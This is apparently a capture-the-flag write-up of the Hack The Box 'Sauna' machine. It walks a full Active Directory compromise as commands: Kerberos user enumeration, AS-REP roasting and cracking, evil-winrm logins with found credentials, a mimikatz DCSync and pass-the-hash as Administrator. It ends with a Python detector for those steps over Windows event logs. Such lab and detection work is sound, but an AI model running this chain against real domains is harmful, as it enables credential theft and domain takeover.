Sauna
Starting off with nmap:
nmap -sC -sV -oA nmap/ -T4 10.129.171.194
# Nmap 7.93 scan initiated Sat Feb 4 19:57:04 2023 as: /snap/nmap/2864/usr/bin/nmap -sC -sV -oA nmap/ -T4 10.129.171.194
Nmap scan report for 10.129.171.194
Host is up (0.052s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-02-05 00:57:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m00s
| smb2-time:
| date: 2023-02-05T00:57:22
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 4 19:58:00 2023 -- 1 IP address (1 host up) scanned in 55.31 seconds
The results tell us a lot: there is a web site on port 80, and ports 53 (DNS) and 88 (Kerberos) show we are dealing with an Active Directory domain controller. The LDAP banner also gives us the domain, EGOTISTICAL-BANK.LOCAL (nmap prints it as EGOTISTICAL-BANK.LOCAL0.). Let's add it to our hosts file just in case:
127.0.0.1 localhost
127.0.1.1 joonas-VirtualBox
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.138.100 eforenzics.htb
10.129.171.194 EGOTISTICAL-BANK.LOCAL
The web page has an "about" page listing some members of the team.
Nothing groundbreaking, but some of them could have accounts in the domain. Let's build a simple wordlist from the names. Common naming schemes are firstname.lastname, first initial dot lastname, and first initial followed by lastname, so the wordlist could look like this:
fergus.smith
f.smith
fsmith
shaun.cois
s.cois
scois
hugo.bear
h.bear
hbear
bowie.taylor
b.taylor
btaylor
sophie.driver
s.driver
sdriver
steven.kerb
s.kerb
skerb
Let's save that in a file called users.txt and use kerbrute to check whether any of them are valid domain users:
kerbrute userenum -d EGOTISTICAL-BANK.LOCAL users.txt --dc 10.129.171.194
We get one valid user: fsmith!
Next, we can check whether that user has Kerberos pre-authentication disabled (i.e. is AS-REP roastable) using Impacket's GetNPUsers.py. First, create a file called user.txt containing fsmith, then run:
GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.129.171.194 -usersfile user.txt -format hashcat -outputfile hashes.txt
We get an AS-REP hash!
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b5bb182b0566624d92c2dc3730913e83$...
This can be cracked with hashcat (here run from a Windows host with the hash saved as hash.txt):
.\hashcat.exe .\hash.txt .\rockyou.txt
We get the password 'Thestrokes23'. Now we can access the server via evil-winrm:
evil-winrm -u fsmith -p Thestrokes23 -i 10.129.171.194
Running winPEAS reveals some AutoLogon credentials stored in the registry.
Interestingly, the AutoLogon username is svc_loanmanager, but no such user exists on the server; the account that does exist is svc_loanmgr, and the password works for it. We can log in with those credentials via evil-winrm:
evil-winrm -u svc_loanmgr -p Moneymakestheworldgoround! -i 10.129.171.194
Next, let's use BloodHound to enumerate further. Upload SharpHound from the evil-winrm session and run it:
upload SharpHound.exe
....
./SharpHound.exe
Now BloodHound reveals something nice:
Basically, svc_loanmgr has replication rights over the domain, so we can run a DCSync attack and pull password hashes from the DC with mimikatz or a similar tool. Let's try that: upload mimikatz and run it:
upload mimikatz.exe
.\mimikatz.exe "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator" exit
We get the Administrator's NTLM hash! We can pass the hash with evil-winrm to log in as Administrator:
evil-winrm -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i 10.129.171.194
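From the defender's side, the two Kerberos/AD steps above leave distinctive traces: AS-REP roasting shows up as a 4768 TGT request with pre-authentication type 0 and RC4 (0x17), and DCSync shows up as a 4662 event in which a principal that is not a domain controller exercises a DS-Replication-Get-Changes right. Here is an added detection example, not part of the original writeup, run over constructed events; the DC account name SAUNA$ is assumed from the nmap hostname.

```python
# Added example, not from the original writeup: detection rules for the
# AS-REP roasting and DCSync steps above, run over constructed Windows
# Security events (4768/4662 field names; SAUNA$ assumed to be the DC).

# Extended rights a DCSync needs (the DS-Replication-Get-Changes family).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # ...-Get-Changes-In-Filtered-Set
}

def is_asrep_roast(ev):
    """4768 issued with no pre-auth (type 0) and RC4 (0x17): the ticket that
    becomes a $krb5asrep$23$ hash like the one GetNPUsers pulled above."""
    return (ev.get("EventID") == 4768 and ev.get("Status") == "0x0"
            and ev.get("PreAuthType") == "0"
            and ev.get("TicketEncryptionType", "").lower() == "0x17")

def is_dcsync(ev, dc_accounts):
    """4662 where a principal that is not a DC exercises a replication right."""
    if ev.get("EventID") != 4662 or ev.get("SubjectUserName") in dc_accounts:
        return False
    props = ev.get("Properties", "").lower()
    return any(guid in props for guid in REPLICATION_GUIDS)

def scan(events, dc_accounts=frozenset({"SAUNA$"})):
    """Return (rule, account) pairs for every event a rule matches."""
    hits = []
    for ev in events:
        if is_asrep_roast(ev):
            hits.append(("asrep_roast", ev["TargetUserName"]))
        if is_dcsync(ev, dc_accounts):
            hits.append(("dcsync", ev["SubjectUserName"]))
    return hits

# Constructed sample events: roastable TGT, normal AES TGT with pre-auth,
# DCSync by the service account, legitimate replication by the DC itself.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "fsmith", "Status": "0x0",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"EventID": 4768, "TargetUserName": "hbear", "Status": "0x0",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```

Enabling pre-authentication on fsmith and removing the replication rights from svc_loanmgr would have closed both paths; the rules above only need the DC's Security log, so they work without any extra agent.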
GGs